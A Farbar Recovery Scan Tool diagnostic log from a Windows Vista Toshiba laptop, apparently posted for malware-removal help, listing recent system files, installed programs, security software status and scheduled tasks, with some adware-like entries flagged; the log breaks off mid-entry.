2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll 2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys 2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe 2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe 2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll 2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe 2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus 2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf 2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows 2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI 2016-01-26 02:57 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-01-26 02:57 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2016-01-24 03:48 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-01-24 03:48 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2016-01-24 03:47 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-01-23 18:07 - 2015-03-18 17:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate 2016-01-23 18:07 - 2014-12-15 16:45 - 00000000 ____D C:\Users\Barbara\AppData\Local\StormWatch 2016-01-23 18:07 - 2014-12-15 16:41 - 00000000 ____D C:\Users\Barbara\AppData\Local\FinanceAlert 2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer 2016-01-23 16:56 - 2015-03-18 17:46 - 00016152 _____ C:\Windows\system32\Drivers\SWDUMon.sys 2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job 2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job 2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A 2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache 2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM 2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help 2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT 2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT 2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan 2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree ==================== Files in the root of some directories ======= 2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat 2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat 2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt 2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt Some files in TEMP: ==================== C:\Users\Barbara\AppData\Local\Temp\exec.exe C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll C:\Users\Barbara\AppData\Local\Temp\uires.dll ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-01-26 03:03 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016 Ran by Barbara (2016-01-26 03:07:15) Running from C:\Users\Barbara\Desktop Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled) Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A} AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D} AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7} AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.) Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated) Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation) ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.) Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation) ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.6) (Version: 5.0.1.6 - Coupons.com Incorporated) CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby) DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.) DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation) DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version: - ) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation) Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version: - Lexmark International, Inc.) Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version: - ) LightScribe 1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.) McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.) Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation) Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla) MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation) QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.) Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.) RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH) Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation) Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated) TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation) Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba) TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA) TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation) TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation) TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation) TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation) TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: - ) TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation) TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation) TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation) TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation) TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version: - ) Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba) TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation) Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.) Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation) TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA) TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: - Agere Systems) TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: - ) TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version: - ) TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version: - ) TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation) TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation) TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation) TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.) WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent) Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.) Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => 